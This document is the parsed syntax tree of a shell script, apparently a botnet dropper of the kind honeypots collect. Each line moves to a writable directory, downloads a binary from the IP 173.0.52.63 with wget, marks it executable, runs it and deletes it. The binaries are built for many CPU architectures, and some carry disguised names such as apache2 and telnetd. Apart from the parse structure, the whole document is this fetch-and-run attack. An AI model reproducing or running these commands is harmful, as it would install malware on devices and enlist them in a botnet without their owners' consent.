ListNode(lineno=2, pos=(12, 155), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 101), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 101), word='http://173.0.52.63/randommips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(101, 102)),
  CommandNode(lineno=2, pos=(103, 122), parts=[
    WordNode(lineno=2, pos=(103, 108), word='chmod'),
    WordNode(lineno=2, pos=(109, 111), word='+x'),
    WordNode(lineno=2, pos=(112, 122), word='randommips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(122, 123)),
  CommandNode(lineno=2, pos=(124, 136), parts=[
    WordNode(lineno=2, pos=(124, 136), word='./randommips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(136, 137)),
  CommandNode(lineno=2, pos=(138, 155), parts=[
    WordNode(lineno=2, pos=(138, 140), word='rm'),
    WordNode(lineno=2, pos=(141, 144), word='-rf'),
    WordNode(lineno=2, pos=(145, 155), word='randommips'),
  ]),
])
ListNode(lineno=3, pos=(156, 307), parts=[
  CommandNode(lineno=3, pos=(156, 163), parts=[
    WordNode(lineno=3, pos=(156, 158), word='cd'),
    WordNode(lineno=3, pos=(159, 163), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(164, 166)),
  CommandNode(lineno=3, pos=(167, 178), parts=[
    WordNode(lineno=3, pos=(167, 169), word='cd'),
    WordNode(lineno=3, pos=(170, 178), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(179, 181)),
  CommandNode(lineno=3, pos=(182, 189), parts=[
    WordNode(lineno=3, pos=(182, 184), word='cd'),
    WordNode(lineno=3, pos=(185, 189), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(190, 192)),
  CommandNode(lineno=3, pos=(193, 201), parts=[
    WordNode(lineno=3, pos=(193, 195), word='cd'),
    WordNode(lineno=3, pos=(196, 201), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(202, 204)),
  CommandNode(lineno=3, pos=(205, 209), parts=[
    WordNode(lineno=3, pos=(205, 207), word='cd'),
    WordNode(lineno=3, pos=(208, 209), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(209, 210)),
  CommandNode(lineno=3, pos=(211, 247), parts=[
    WordNode(lineno=3, pos=(211, 215), word='wget'),
    WordNode(lineno=3, pos=(216, 247), word='http://173.0.52.63/randommipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(247, 248)),
  CommandNode(lineno=3, pos=(249, 270), parts=[
    WordNode(lineno=3, pos=(249, 254), word='chmod'),
    WordNode(lineno=3, pos=(255, 257), word='+x'),
    WordNode(lineno=3, pos=(258, 270), word='randommipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(270, 271)),
  CommandNode(lineno=3, pos=(272, 286), parts=[
    WordNode(lineno=3, pos=(272, 286), word='./randommipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(286, 287)),
  CommandNode(lineno=3, pos=(288, 307), parts=[
    WordNode(lineno=3, pos=(288, 290), word='rm'),
    WordNode(lineno=3, pos=(291, 294), word='-rf'),
    WordNode(lineno=3, pos=(295, 307), word='randommipsel'),
  ]),
])
ListNode(lineno=4, pos=(308, 447), parts=[
  CommandNode(lineno=4, pos=(308, 315), parts=[
    WordNode(lineno=4, pos=(308, 310), word='cd'),
    WordNode(lineno=4, pos=(311, 315), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(316, 318)),
  CommandNode(lineno=4, pos=(319, 330), parts=[
    WordNode(lineno=4, pos=(319, 321), word='cd'),
    WordNode(lineno=4, pos=(322, 330), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(331, 333)),
  CommandNode(lineno=4, pos=(334, 341), parts=[
    WordNode(lineno=4, pos=(334, 336), word='cd'),
    WordNode(lineno=4, pos=(337, 341), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(342, 344)),
  CommandNode(lineno=4, pos=(345, 353), parts=[
    WordNode(lineno=4, pos=(345, 347), word='cd'),
    WordNode(lineno=4, pos=(348, 353), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(354, 356)),
  CommandNode(lineno=4, pos=(357, 361), parts=[
    WordNode(lineno=4, pos=(357, 359), word='cd'),
    WordNode(lineno=4, pos=(360, 361), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(361, 362)),
  CommandNode(lineno=4, pos=(363, 396), parts=[
    WordNode(lineno=4, pos=(363, 367), word='wget'),
    WordNode(lineno=4, pos=(368, 396), word='http://173.0.52.63/randomsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(396, 397)),
  CommandNode(lineno=4, pos=(398, 416), parts=[
    WordNode(lineno=4, pos=(398, 403), word='chmod'),
    WordNode(lineno=4, pos=(404, 406), word='+x'),
    WordNode(lineno=4, pos=(407, 416), word='randomsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(416, 417)),
  CommandNode(lineno=4, pos=(418, 429), parts=[
    WordNode(lineno=4, pos=(418, 429), word='./randomsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(429, 430)),
  CommandNode(lineno=4, pos=(431, 447), parts=[
    WordNode(lineno=4, pos=(431, 433), word='rm'),
    WordNode(lineno=4, pos=(434, 437), word='-rf'),
    WordNode(lineno=4, pos=(438, 447), word='randomsh4'),
  ]),
])
ListNode(lineno=5, pos=(448, 587), parts=[
  CommandNode(lineno=5, pos=(448, 455), parts=[
    WordNode(lineno=5, pos=(448, 450), word='cd'),
    WordNode(lineno=5, pos=(451, 455), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(456, 458)),
  CommandNode(lineno=5, pos=(459, 470), parts=[
    WordNode(lineno=5, pos=(459, 461), word='cd'),
    WordNode(lineno=5, pos=(462, 470), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(471, 473)),
  CommandNode(lineno=5, pos=(474, 481), parts=[
    WordNode(lineno=5, pos=(474, 476), word='cd'),
    WordNode(lineno=5, pos=(477, 481), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(482, 484)),
  CommandNode(lineno=5, pos=(485, 493), parts=[
    WordNode(lineno=5, pos=(485, 487), word='cd'),
    WordNode(lineno=5, pos=(488, 493), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(494, 496)),
  CommandNode(lineno=5, pos=(497, 501), parts=[
    WordNode(lineno=5, pos=(497, 499), word='cd'),
    WordNode(lineno=5, pos=(500, 501), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(501, 502)),
  CommandNode(lineno=5, pos=(503, 536), parts=[
    WordNode(lineno=5, pos=(503, 507), word='wget'),
    WordNode(lineno=5, pos=(508, 536), word='http://173.0.52.63/randomx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(536, 537)),
  CommandNode(lineno=5, pos=(538, 556), parts=[
    WordNode(lineno=5, pos=(538, 543), word='chmod'),
    WordNode(lineno=5, pos=(544, 546), word='+x'),
    WordNode(lineno=5, pos=(547, 556), word='randomx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(556, 557)),
  CommandNode(lineno=5, pos=(558, 569), parts=[
    WordNode(lineno=5, pos=(558, 569), word='./randomx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(569, 570)),
  CommandNode(lineno=5, pos=(571, 587), parts=[
    WordNode(lineno=5, pos=(571, 573), word='rm'),
    WordNode(lineno=5, pos=(574, 577), word='-rf'),
    WordNode(lineno=5, pos=(578, 587), word='randomx64'),
  ]),
])
ListNode(lineno=6, pos=(588, 727), parts=[
  CommandNode(lineno=6, pos=(588, 595), parts=[
    WordNode(lineno=6, pos=(588, 590), word='cd'),
    WordNode(lineno=6, pos=(591, 595), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(596, 598)),
  CommandNode(lineno=6, pos=(599, 610), parts=[
    WordNode(lineno=6, pos=(599, 601), word='cd'),
    WordNode(lineno=6, pos=(602, 610), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(611, 613)),
  CommandNode(lineno=6, pos=(614, 621), parts=[
    WordNode(lineno=6, pos=(614, 616), word='cd'),
    WordNode(lineno=6, pos=(617, 621), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(622, 624)),
  CommandNode(lineno=6, pos=(625, 633), parts=[
    WordNode(lineno=6, pos=(625, 627), word='cd'),
    WordNode(lineno=6, pos=(628, 633), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(634, 636)),
  CommandNode(lineno=6, pos=(637, 641), parts=[
    WordNode(lineno=6, pos=(637, 639), word='cd'),
    WordNode(lineno=6, pos=(640, 641), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(641, 642)),
  CommandNode(lineno=6, pos=(643, 676), parts=[
    WordNode(lineno=6, pos=(643, 647), word='wget'),
    WordNode(lineno=6, pos=(648, 676), word='http://173.0.52.63/randomarm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(676, 677)),
  CommandNode(lineno=6, pos=(678, 696), parts=[
    WordNode(lineno=6, pos=(678, 683), word='chmod'),
    WordNode(lineno=6, pos=(684, 686), word='+x'),
    WordNode(lineno=6, pos=(687, 696), word='randomarm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(696, 697)),
  CommandNode(lineno=6, pos=(698, 709), parts=[
    WordNode(lineno=6, pos=(698, 709), word='./randomarm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(709, 710)),
  CommandNode(lineno=6, pos=(711, 727), parts=[
    WordNode(lineno=6, pos=(711, 713), word='rm'),
    WordNode(lineno=6, pos=(714, 717), word='-rf'),
    WordNode(lineno=6, pos=(718, 727), word='randomarm'),
  ]),
])
ListNode(lineno=7, pos=(728, 871), parts=[
  CommandNode(lineno=7, pos=(728, 735), parts=[
    WordNode(lineno=7, pos=(728, 730), word='cd'),
    WordNode(lineno=7, pos=(731, 735), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(736, 738)),
  CommandNode(lineno=7, pos=(739, 750), parts=[
    WordNode(lineno=7, pos=(739, 741), word='cd'),
    WordNode(lineno=7, pos=(742, 750), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(751, 753)),
  CommandNode(lineno=7, pos=(754, 761), parts=[
    WordNode(lineno=7, pos=(754, 756), word='cd'),
    WordNode(lineno=7, pos=(757, 761), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(762, 764)),
  CommandNode(lineno=7, pos=(765, 773), parts=[
    WordNode(lineno=7, pos=(765, 767), word='cd'),
    WordNode(lineno=7, pos=(768, 773), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(774, 776)),
  CommandNode(lineno=7, pos=(777, 781), parts=[
    WordNode(lineno=7, pos=(777, 779), word='cd'),
    WordNode(lineno=7, pos=(780, 781), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(781, 782)),
  CommandNode(lineno=7, pos=(783, 817), parts=[
    WordNode(lineno=7, pos=(783, 787), word='wget'),
    WordNode(lineno=7, pos=(788, 817), word='http://173.0.52.63/randomi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(817, 818)),
  CommandNode(lineno=7, pos=(819, 838), parts=[
    WordNode(lineno=7, pos=(819, 824), word='chmod'),
    WordNode(lineno=7, pos=(825, 827), word='+x'),
    WordNode(lineno=7, pos=(828, 838), word='randomi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(838, 839)),
  CommandNode(lineno=7, pos=(840, 852), parts=[
    WordNode(lineno=7, pos=(840, 852), word='./randomi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(852, 853)),
  CommandNode(lineno=7, pos=(854, 871), parts=[
    WordNode(lineno=7, pos=(854, 856), word='rm'),
    WordNode(lineno=7, pos=(857, 860), word='-rf'),
    WordNode(lineno=7, pos=(861, 871), word='randomi686'),
  ]),
])
ListNode(lineno=8, pos=(872, 1011), parts=[
  CommandNode(lineno=8, pos=(872, 879), parts=[
    WordNode(lineno=8, pos=(872, 874), word='cd'),
    WordNode(lineno=8, pos=(875, 879), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(880, 882)),
  CommandNode(lineno=8, pos=(883, 894), parts=[
    WordNode(lineno=8, pos=(883, 885), word='cd'),
    WordNode(lineno=8, pos=(886, 894), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(895, 897)),
  CommandNode(lineno=8, pos=(898, 905), parts=[
    WordNode(lineno=8, pos=(898, 900), word='cd'),
    WordNode(lineno=8, pos=(901, 905), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(906, 908)),
  CommandNode(lineno=8, pos=(909, 917), parts=[
    WordNode(lineno=8, pos=(909, 911), word='cd'),
    WordNode(lineno=8, pos=(912, 917), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(918, 920)),
  CommandNode(lineno=8, pos=(921, 925), parts=[
    WordNode(lineno=8, pos=(921, 923), word='cd'),
    WordNode(lineno=8, pos=(924, 925), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(925, 926)),
  CommandNode(lineno=8, pos=(927, 960), parts=[
    WordNode(lineno=8, pos=(927, 931), word='wget'),
    WordNode(lineno=8, pos=(932, 960), word='http://173.0.52.63/randomppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(960, 961)),
  CommandNode(lineno=8, pos=(962, 980), parts=[
    WordNode(lineno=8, pos=(962, 967), word='chmod'),
    WordNode(lineno=8, pos=(968, 970), word='+x'),
    WordNode(lineno=8, pos=(971, 980), word='randomppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(980, 981)),
  CommandNode(lineno=8, pos=(982, 993), parts=[
    WordNode(lineno=8, pos=(982, 993), word='./randomppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(993, 994)),
  CommandNode(lineno=8, pos=(995, 1011), parts=[
    WordNode(lineno=8, pos=(995, 997), word='rm'),
    WordNode(lineno=8, pos=(998, 1001), word='-rf'),
    WordNode(lineno=8, pos=(1002, 1011), word='randomppc'),
  ]),
])
ListNode(lineno=9, pos=(1012, 1127), parts=[
  CommandNode(lineno=9, pos=(1012, 1019), parts=[
    WordNode(lineno=9, pos=(1012, 1014), word='cd'),
    WordNode(lineno=9, pos=(1015, 1019), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1020, 1022)),
  CommandNode(lineno=9, pos=(1023, 1034), parts=[
    WordNode(lineno=9, pos=(1023, 1025), word='cd'),
    WordNode(lineno=9, pos=(1026, 1034), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1035, 1037)),
  CommandNode(lineno=9, pos=(1038, 1045), parts=[
    WordNode(lineno=9, pos=(1038, 1040), word='cd'),
    WordNode(lineno=9, pos=(1041, 1045), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1046, 1048)),
  CommandNode(lineno=9, pos=(1049, 1057), parts=[
    WordNode(lineno=9, pos=(1049, 1051), word='cd'),
    WordNode(lineno=9, pos=(1052, 1057), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1058, 1060)),
  CommandNode(lineno=9, pos=(1061, 1065), parts=[
    WordNode(lineno=9, pos=(1061, 1063), word='cd'),
    WordNode(lineno=9, pos=(1064, 1065), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1065, 1066)),
  CommandNode(lineno=9, pos=(1067, 1094), parts=[
    WordNode(lineno=9, pos=(1067, 1071), word='wget'),
    WordNode(lineno=9, pos=(1072, 1094), word='http://173.0.52.63/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1094, 1095)),
  CommandNode(lineno=9, pos=(1096, 1108), parts=[
    WordNode(lineno=9, pos=(1096, 1101), word='chmod'),
    WordNode(lineno=9, pos=(1102, 1104), word='+x'),
    WordNode(lineno=9, pos=(1105, 1108), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1108, 1109)),
  CommandNode(lineno=9, pos=(1110, 1115), parts=[
    WordNode(lineno=9, pos=(1110, 1115), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1115, 1116)),
  CommandNode(lineno=9, pos=(1117, 1127), parts=[
    WordNode(lineno=9, pos=(1117, 1119), word='rm'),
    WordNode(lineno=9, pos=(1120, 1123), word='-rf'),
    WordNode(lineno=9, pos=(1124, 1127), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(1128, 1247), parts=[
  CommandNode(lineno=10, pos=(1128, 1135), parts=[
    WordNode(lineno=10, pos=(1128, 1130), word='cd'),
    WordNode(lineno=10, pos=(1131, 1135), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1136, 1138)),
  CommandNode(lineno=10, pos=(1139, 1150), parts=[
    WordNode(lineno=10, pos=(1139, 1141), word='cd'),
    WordNode(lineno=10, pos=(1142, 1150), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1151, 1153)),
  CommandNode(lineno=10, pos=(1154, 1161), parts=[
    WordNode(lineno=10, pos=(1154, 1156), word='cd'),
    WordNode(lineno=10, pos=(1157, 1161), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1162, 1164)),
  CommandNode(lineno=10, pos=(1165, 1173), parts=[
    WordNode(lineno=10, pos=(1165, 1167), word='cd'),
    WordNode(lineno=10, pos=(1168, 1173), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1174, 1176)),
  CommandNode(lineno=10, pos=(1177, 1181), parts=[
    WordNode(lineno=10, pos=(1177, 1179), word='cd'),
    WordNode(lineno=10, pos=(1180, 1181), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1181, 1182)),
  CommandNode(lineno=10, pos=(1183, 1211), parts=[
    WordNode(lineno=10, pos=(1183, 1187), word='wget'),
    WordNode(lineno=10, pos=(1188, 1211), word='http://173.0.52.63/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1211, 1212)),
  CommandNode(lineno=10, pos=(1213, 1226), parts=[
    WordNode(lineno=10, pos=(1213, 1218), word='chmod'),
    WordNode(lineno=10, pos=(1219, 1221), word='+x'),
    WordNode(lineno=10, pos=(1222, 1226), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1226, 1227)),
  CommandNode(lineno=10, pos=(1228, 1234), parts=[
    WordNode(lineno=10, pos=(1228, 1234), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1234, 1235)),
  CommandNode(lineno=10, pos=(1236, 1247), parts=[
    WordNode(lineno=10, pos=(1236, 1238), word='rm'),
    WordNode(lineno=10, pos=(1239, 1242), word='-rf'),
    WordNode(lineno=10, pos=(1243, 1247), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1248, 1395), parts=[
  CommandNode(lineno=11, pos=(1248, 1255), parts=[
    WordNode(lineno=11, pos=(1248, 1250), word='cd'),
    WordNode(lineno=11, pos=(1251, 1255), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1256, 1258)),
  CommandNode(lineno=11, pos=(1259, 1270), parts=[
    WordNode(lineno=11, pos=(1259, 1261), word='cd'),
    WordNode(lineno=11, pos=(1262, 1270), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1271, 1273)),
  CommandNode(lineno=11, pos=(1274, 1281), parts=[
    WordNode(lineno=11, pos=(1274, 1276), word='cd'),
    WordNode(lineno=11, pos=(1277, 1281), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1282, 1284)),
  CommandNode(lineno=11, pos=(1285, 1293), parts=[
    WordNode(lineno=11, pos=(1285, 1287), word='cd'),
    WordNode(lineno=11, pos=(1288, 1293), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1294, 1296)),
  CommandNode(lineno=11, pos=(1297, 1301), parts=[
    WordNode(lineno=11, pos=(1297, 1299), word='cd'),
    WordNode(lineno=11, pos=(1300, 1301), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1301, 1302)),
  CommandNode(lineno=11, pos=(1303, 1338), parts=[
    WordNode(lineno=11, pos=(1303, 1307), word='wget'),
    WordNode(lineno=11, pos=(1308, 1338), word='http://173.0.52.63/randomsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1338, 1339)),
  CommandNode(lineno=11, pos=(1340, 1360), parts=[
    WordNode(lineno=11, pos=(1340, 1345), word='chmod'),
    WordNode(lineno=11, pos=(1346, 1348), word='+x'),
    WordNode(lineno=11, pos=(1349, 1360), word='randomsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1360, 1361)),
  CommandNode(lineno=11, pos=(1362, 1375), parts=[
    WordNode(lineno=11, pos=(1362, 1375), word='./randomsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1375, 1376)),
  CommandNode(lineno=11, pos=(1377, 1395), parts=[
    WordNode(lineno=11, pos=(1377, 1379), word='rm'),
    WordNode(lineno=11, pos=(1380, 1383), word='-rf'),
    WordNode(lineno=11, pos=(1384, 1395), word='randomsparc'),
  ]),
])
ListNode(lineno=12, pos=(1396, 1511), parts=[
  CommandNode(lineno=12, pos=(1396, 1403), parts=[
    WordNode(lineno=12, pos=(1396, 1398), word='cd'),
    WordNode(lineno=12, pos=(1399, 1403), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1404, 1406)),
  CommandNode(lineno=12, pos=(1407, 1418), parts=[
    WordNode(lineno=12, pos=(1407, 1409), word='cd'),
    WordNode(lineno=12, pos=(1410, 1418), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1419, 1421)),
  CommandNode(lineno=12, pos=(1422, 1429), parts=[
    WordNode(lineno=12, pos=(1422, 1424), word='cd'),
    WordNode(lineno=12, pos=(1425, 1429), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1430, 1432)),
  CommandNode(lineno=12, pos=(1433, 1441), parts=[
    WordNode(lineno=12, pos=(1433, 1435), word='cd'),
    WordNode(lineno=12, pos=(1436, 1441), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1442, 1444)),
  CommandNode(lineno=12, pos=(1445, 1449), parts=[
    WordNode(lineno=12, pos=(1445, 1447), word='cd'),
    WordNode(lineno=12, pos=(1448, 1449), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1449, 1450)),
  CommandNode(lineno=12, pos=(1451, 1478), parts=[
    WordNode(lineno=12, pos=(1451, 1455), word='wget'),
    WordNode(lineno=12, pos=(1456, 1478), word='http://173.0.52.63/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1478, 1479)),
  CommandNode(lineno=12, pos=(1480, 1492), parts=[
    WordNode(lineno=12, pos=(1480, 1485), word='chmod'),
    WordNode(lineno=12, pos=(1486, 1488), word='+x'),
    WordNode(lineno=12, pos=(1489, 1492), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1492, 1493)),
  CommandNode(lineno=12, pos=(1494, 1499), parts=[
    WordNode(lineno=12, pos=(1494, 1499), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1499, 1500)),
  CommandNode(lineno=12, pos=(1501, 1511), parts=[
    WordNode(lineno=12, pos=(1501, 1503), word='rm'),
    WordNode(lineno=12, pos=(1504, 1507), word='-rf'),
    WordNode(lineno=12, pos=(1508, 1511), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1512, 1643), parts=[
  CommandNode(lineno=13, pos=(1512, 1519), parts=[
    WordNode(lineno=13, pos=(1512, 1514), word='cd'),
    WordNode(lineno=13, pos=(1515, 1519), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1520, 1522)),
  CommandNode(lineno=13, pos=(1523, 1534), parts=[
    WordNode(lineno=13, pos=(1523, 1525), word='cd'),
    WordNode(lineno=13, pos=(1526, 1534), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1535, 1537)),
  CommandNode(lineno=13, pos=(1538, 1545), parts=[
    WordNode(lineno=13, pos=(1538, 1540), word='cd'),
    WordNode(lineno=13, pos=(1541, 1545), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1546, 1548)),
  CommandNode(lineno=13, pos=(1549, 1557), parts=[
    WordNode(lineno=13, pos=(1549, 1551), word='cd'),
    WordNode(lineno=13, pos=(1552, 1557), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1558, 1560)),
  CommandNode(lineno=13, pos=(1561, 1565), parts=[
    WordNode(lineno=13, pos=(1561, 1563), word='cd'),
    WordNode(lineno=13, pos=(1564, 1565), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1565, 1566)),
  CommandNode(lineno=13, pos=(1567, 1598), parts=[
    WordNode(lineno=13, pos=(1567, 1571), word='wget'),
    WordNode(lineno=13, pos=(1572, 1598), word='http://173.0.52.63/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1598, 1599)),
  CommandNode(lineno=13, pos=(1600, 1616), parts=[
    WordNode(lineno=13, pos=(1600, 1605), word='chmod'),
    WordNode(lineno=13, pos=(1606, 1608), word='+x'),
    WordNode(lineno=13, pos=(1609, 1616), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1616, 1617)),
  CommandNode(lineno=13, pos=(1618, 1627), parts=[
    WordNode(lineno=13, pos=(1618, 1627), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1627, 1628)),
  CommandNode(lineno=13, pos=(1629, 1643), parts=[
    WordNode(lineno=13, pos=(1629, 1631), word='rm'),
    WordNode(lineno=13, pos=(1632, 1635), word='-rf'),
    WordNode(lineno=13, pos=(1636, 1643), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1644, 1775), parts=[
  CommandNode(lineno=14, pos=(1644, 1651), parts=[
    WordNode(lineno=14, pos=(1644, 1646), word='cd'),
    WordNode(lineno=14, pos=(1647, 1651), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1652, 1654)),
  CommandNode(lineno=14, pos=(1655, 1666), parts=[
    WordNode(lineno=14, pos=(1655, 1657), word='cd'),
    WordNode(lineno=14, pos=(1658, 1666), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1667, 1669)),
  CommandNode(lineno=14, pos=(1670, 1677), parts=[
    WordNode(lineno=14, pos=(1670, 1672), word='cd'),
    WordNode(lineno=14, pos=(1673, 1677), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1678, 1680)),
  CommandNode(lineno=14, pos=(1681, 1689), parts=[
    WordNode(lineno=14, pos=(1681, 1683), word='cd'),
    WordNode(lineno=14, pos=(1684, 1689), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1690, 1692)),
  CommandNode(lineno=14, pos=(1693, 1697), parts=[
    WordNode(lineno=14, pos=(1693, 1695), word='cd'),
    WordNode(lineno=14, pos=(1696, 1697), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1697, 1698)),
  CommandNode(lineno=14, pos=(1699, 1730), parts=[
    WordNode(lineno=14, pos=(1699, 1703), word='wget'),
    WordNode(lineno=14, pos=(1704, 1730), word='http://173.0.52.63/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1730, 1731)),
  CommandNode(lineno=14, pos=(1732, 1748), parts=[
    WordNode(lineno=14, pos=(1732, 1737), word='chmod'),
    WordNode(lineno=14, pos=(1738, 1740), word='+x'),
    WordNode(lineno=14, pos=(1741, 1748), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1748, 1749)),
  CommandNode(lineno=14, pos=(1750, 1759), parts=[
    WordNode(lineno=14, pos=(1750, 1759), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1759, 1760)),
  CommandNode(lineno=14, pos=(1761, 1775), parts=[
    WordNode(lineno=14, pos=(1761, 1763), word='rm'),
    WordNode(lineno=14, pos=(1764, 1767), word='-rf'),
    WordNode(lineno=14, pos=(1768, 1775), word='telnetd'),
  ]),
])
